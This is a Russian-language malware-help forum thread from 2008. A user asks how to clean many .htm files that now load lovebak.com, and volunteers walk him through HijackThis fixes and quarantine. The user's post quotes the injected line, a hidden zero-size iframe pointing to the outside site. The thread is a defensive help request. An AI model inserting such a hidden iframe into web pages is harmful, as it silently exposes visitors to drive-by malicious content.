Показано с 1 по 10 из 10.

Вирус поудалял многие htm-файлы и поставил в загрузку lovebak.com (заявка № 18696)

  1. #1
    Junior Member Репутация
    Регистрация
    20.02.2008
    Сообщений
    11
    Вес репутации
    33

    Question Вирус поудалял многие htm-файлы и поставил в загрузку lovebak.com

    Помогите, пожалуйста, уважаемые форумчане!
    Какой-то вирус у меня поудалял многие htm-файлы. Обнаружилось это недавно, но напакостил он, видимо, с месяц назад. То, что никуда не было скопировано (например, на рабочий комп), восстановить, конечно, не удастся, но осталась другая фигня. Те файлы, которые еще остались (их, к счастью, осталось много), при открытии начинают загружать какой-то сайт www.lovebak.com. При прочтении исходного кода любой страницы обнаруживается, что в конце везде стоит следующая строчка:
    <iframe src=http://www.lovebak.com/qq.htm width="0" height="0"></iframe>
    У всех измененных файлов одна и та же дата: 29.01.08 (видимо, тогда и были удалены многие файлы)
    У меня несколько вопросов:
    1. Сталкивался ли кто-нибудь с таким?
    2. Вирус, видимо, уже давно удален, поскольку антивирус ничего не находит, но может ли загрузка этого lovebak привести к каким-нибудь проблемам?
    3. В любом случае, можно ли как-нибудь удалить вышеприведенную строчку во всех htm-файлах? По одному это придется делать очень долго.
    Заранее спасибо.
    Последний раз редактировалось drongo; 26.02.2008 в 17:49.

  2. Реклама
     

  3. #2
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для rubin
    Регистрация
    15.10.2007
    Адрес
    Казань
    Сообщений
    2,934
    Вес репутации
    538

  4. #3
    Junior Member Репутация
    Регистрация
    20.02.2008
    Сообщений
    11
    Вес репутации
    33
    Добавил 3 файла после проверки компьютера. Надеюсь, теперь подскажете, можно ли что-то сделать с htm-файлами. Вообще у меня подозрение, что удалил их сам антивирус (Касперский), который решил, что вылечить их нельзя. (А именно в день, который стоит в дате у всех измененных файлов, я делал проверку и обнаружил червя.) Но что делать с оставшимися, которые постоянно грузят какой-то lovebak.com?
    Вложения Вложения

  5. #4
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для rubin
    Регистрация
    15.10.2007
    Адрес
    Казань
    Сообщений
    2,934
    Вес репутации
    538
    Пофиксить в HijackThis следующие строчки( http://virusinfo.info/showthread.php?t=4491 )
    Код:
    F2 - REG:system.ini: UserInit=userinit.exe,autorun.bat
    O2 - BHO: (no name) - {A5366673-E8CA-11D3-9CD9-0090271D075B} - (no file)
    O3 - Toolbar: Easy-WebPrint - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - (no file)
    O16 - DPF: {1D6711C8-7154-40BB-8380-3DEA45B69CBF} -
    O20 - Winlogon Notify: winzoa32 - C:\WINDOWS\
    autorun.bat - поищите через AVZ - добавьте в карантин
    C:\wincmd\WINCMD32.EXE - и его в карантин

    Карантин пришлите по правилам сюда - http://virusinfo.info/upload_virus.php?tid=18696

  6. #5
    Junior Member Репутация
    Регистрация
    20.02.2008
    Сообщений
    11
    Вес репутации
    33
    Пофиксил. Добавил в карантин C:\wincmd\WINCMD32.EXE, а autorun.bat не добавляется. AVZ пишет: "Ошибка карантина файла, попытка прямого чтения". Что делать?

  7. #6
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для rubin
    Регистрация
    15.10.2007
    Адрес
    Казань
    Сообщений
    2,934
    Вес репутации
    538
    Ну пришлите, что есть

  8. #7
    Junior Member Репутация
    Регистрация
    20.02.2008
    Сообщений
    11
    Вес репутации
    33
    Послал.

  9. #8
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для rubin
    Регистрация
    15.10.2007
    Адрес
    Казань
    Сообщений
    2,934
    Вес репутации
    538
    WINCMD32.EXE - чист

    Проблема еще осталась?

  10. #9
    Junior Member Репутация
    Регистрация
    20.02.2008
    Сообщений
    11
    Вес репутации
    33
    В htm-файлах по-прежнему стоит загрузка lovebak.com. В принципе, она не так уж достает, потому что я ее сразу же прерываю. Но все равно можно ли убрать строку загрузки из всех htm-файлов не вручную, по одному?

  11. #10
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    47,541
    Вес репутации
    941

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 1
    • В ходе лечения вредоносные программы в карантинах не обнаружены


  • Уважаемый(ая) Featus, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:


    Надеемся больше никогда не увидеть ваш компьютер зараженным!

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
  • Присоединяйтесь к нам в соцсетях!

    Мы делаем все возможное, чтобы помогать людям в защите и лечении компьютеров.

    Похожие темы

    1. Ответов: 12
      Последнее сообщение: 17.07.2012, 12:43
    2. Ответов: 5
      Последнее сообщение: 29.08.2011, 21:48
    3. Ответов: 2
      Последнее сообщение: 07.10.2010, 00:07
    4. вирус убил загрузку Виндоус
      От jkeg в разделе Помогите!
      Ответов: 5
      Последнее сообщение: 28.01.2010, 04:11
    5. Ответов: 13
      Последнее сообщение: 10.12.2009, 20:24

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00026 seconds with 21 queries